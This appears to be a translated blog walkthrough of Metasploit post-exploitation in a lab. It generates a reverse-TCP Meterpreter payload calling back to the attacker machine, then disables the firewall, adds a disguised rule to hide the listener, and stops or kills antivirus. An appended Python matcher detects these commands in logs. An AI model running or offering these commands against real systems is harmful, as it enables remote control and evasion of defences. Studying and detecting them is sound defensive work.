Intranet Penetration: Internal Network Information Gathering (Part 1)
2022-07-06 09:22:00 【不知名白帽】
Intranet Penetration: Internal Network Information Gathering (Part 2) - 不知名白帽's blog - CSDN Blog
Metasploit internal network information gathering
Attack machine: kali 192.168.0.103
Target machine: win7 192.168.0.105
01 msf reverse shell
First, generate a payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=4444 -f exe > shell.exe
02 msf reverse shell
Configure the handler for the reverse session
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.0.103
set lport 4444
exploit
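Send the payload to the target machine and have it executed
Execution succeeded
Linux cannot render the Chinese characters in Windows output, so they appear garbled; change the code page (65001 stands for UTF-8)
03 Disabling the firewall through the shell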
shell(execute -f cmd -i -H)
netsh advfirewall set allprofiles state off (turn the firewall off)
netsh advfirewall show allprofiles (show the firewall status)
Add a firewall rule through policy to conceal the activity
netsh advfirewall firewall add rule name="VMWARE" protocol=TCP dir=in localport=4444 action=allow
netsh firewall add portopening TCP 4444 "VMWARE" ENABLE ALL
Reboot for the change to take effect (forces win7 to restart):
shutdown -r -f -t 0
04 Disabling antivirus software
Stop windefend
net stop windefend
Kill the antivirus software
run killav
run post/windows/manage/killav
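The commands in sections 03 and 04 show up as process-creation command lines when command-line logging is enabled (Windows Security event 4688 or Sysmon event ID 1). The following is an added example, not part of the original post: a Python matcher that flags those commands and raises severity when firewall and Defender tampering occur on the same host. The rule names, host names and sample records are constructed for illustration.

```python
import re
from collections import defaultdict

# Patterns for the commands in sections 03 and 04; rule names are hypothetical labels.
RULES = {
    "firewall_disabled": r'\bnetsh(\.exe)?"?\s+advfirewall\s+set\s+\w+\s+state\s+off\b',
    "firewall_rule_added": r'\bnetsh(\.exe)?"?\s+advfirewall\s+firewall\s+add\s+rule\b',
    "firewall_legacy_portopening": r'\bnetsh(\.exe)?"?\s+firewall\s+add\s+portopening\b',
    "defender_service_stopped": r'\b(net1?|sc)(\.exe)?"?\s+stop\s+"?windefend\b',
    "forced_reboot": r'\bshutdown(\.exe)?"?\s+(?=.*[-/]r\b)(?=.*[-/]f\b)(?=.*[-/]t\s+0\b)',
}
COMPILED = {name: re.compile(rx, re.I) for name, rx in RULES.items()}

# Constructed sample records (host, command line) shaped like process-creation
# events; none of these lines come from a real log.
SAMPLE_EVENTS = [
    ("WIN7-LAB", r"C:\Windows\system32\cmd.exe"),
    ("WIN7-LAB", "netsh advfirewall set allprofiles state off"),
    ("WIN7-LAB", "netsh advfirewall show allprofiles"),
    ("WIN7-LAB", 'netsh firewall add portopening TCP 4444 "VMWARE" ENABLE ALL'),
    ("WIN7-LAB", r"C:\Windows\System32\net.exe stop windefend"),
    ("WIN7-LAB", "shutdown -r -f -t 0"),
    ("HR-PC-07", "netsh advfirewall show allprofiles"),
    ("HR-PC-07", "shutdown /r /t 60"),
]

def match_rules(command_line):
    """Return the names of all rules that the command line triggers."""
    return [name for name, rx in COMPILED.items() if rx.search(command_line)]

def triage(events):
    """Group hits per host; firewall plus Defender tampering on one host is 'high'."""
    hits = defaultdict(list)
    for host, command_line in events:
        hits[host].extend(match_rules(command_line))
    report = {}
    for host, names in hits.items():
        if not names:
            continue  # read-only or benign commands produce no finding
        firewall = any(n.startswith("firewall_") for n in names)
        defender = "defender_service_stopped" in names
        report[host] = {"severity": "high" if firewall and defender else "medium",
                        "rules": names}
    return report

if __name__ == "__main__":
    for host, result in triage(SAMPLE_EVENTS).items():
        print(host, result["severity"], ", ".join(result["rules"]))
```

The read-only `show allprofiles` query and a delayed, non-forced reboot are deliberately left unflagged to keep the rules from firing on routine administration.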